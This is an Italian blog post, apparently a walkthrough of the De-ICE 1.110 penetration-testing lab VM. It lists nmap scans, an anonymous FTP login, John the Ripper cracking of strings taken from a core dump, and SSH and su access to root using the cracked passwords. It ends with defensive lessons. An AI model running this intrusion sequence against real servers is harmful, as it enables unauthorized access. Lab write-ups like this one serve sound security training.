Questa volta l'esercizio mi ha portato sulla versione de-ICE 1.110... Rispetto alla precedente versione testata, questa ha ben poca differenza... Dopo aver fatto la prima, questa versione diventa molto facile da testare... A parte il comando strings, che io non conoscevo ma che si può trovare nei suggerimenti che la stessa distribuzione da, risulta molto più facile del primo episodio...
Come sempre si inizia con nmap per scoprire l'indirizzo della vittima e per verificare le porte aperte ed i servizi in ascolto:
- nmap -sP -n 192.168.1.*
- nmap -sS -sV -O -n 192.168.1.110
Ovviamente tralascio il significato delle opzioni, che comunque si trovano nel manuale di nmap. Possiamo tralasciare l'apertura del servizio web, in quanto le vere informazioni si trovano nella cartella download accessibile in via anonima via ftp. Infatti si può accedere al servizio con username:anonymous e password:anonymos.
- ftp 192.168.1.110
- user:anonymous pass:anonymous
- ls -a
- cd download
- cd etc
- get core
- file core
- strings core
- cd /pentest/password/john
- ./john --wordlist="percorso del dizionario" --rules /root/Desktop/strings
- ssh ccoffee@192.168.1.110
- pass:Diatomaceous
- su
- pass:Complexity
- cd ..
- cd root
- ls -a
- cd .save
- cat copy.sh
Importanti conoscenze contenute in questo tutorial... Mai lasciare un server ftp in mnodalità anonima, permette di accedervi, e magari caricare una shell remota che ci permette poi di scalare i privilegi... In più, mai lasciare file importanti come copy.sh dentro al server, in quanto contengono informazioni importanti per decifrare i file... Così come i file dump, dovrebbero essere esaminati e poi cancellati... Siamo riusciti ad accedere al server semplicemente con questi due piccoli errori... Da non dimenticare di spulciare per bene i server, magari contengono cartelle nascoste, come in questo caso... Un ls -a è sempre utile...
ps:thanks to g0tm1lk
Nessun commento:
Posta un commento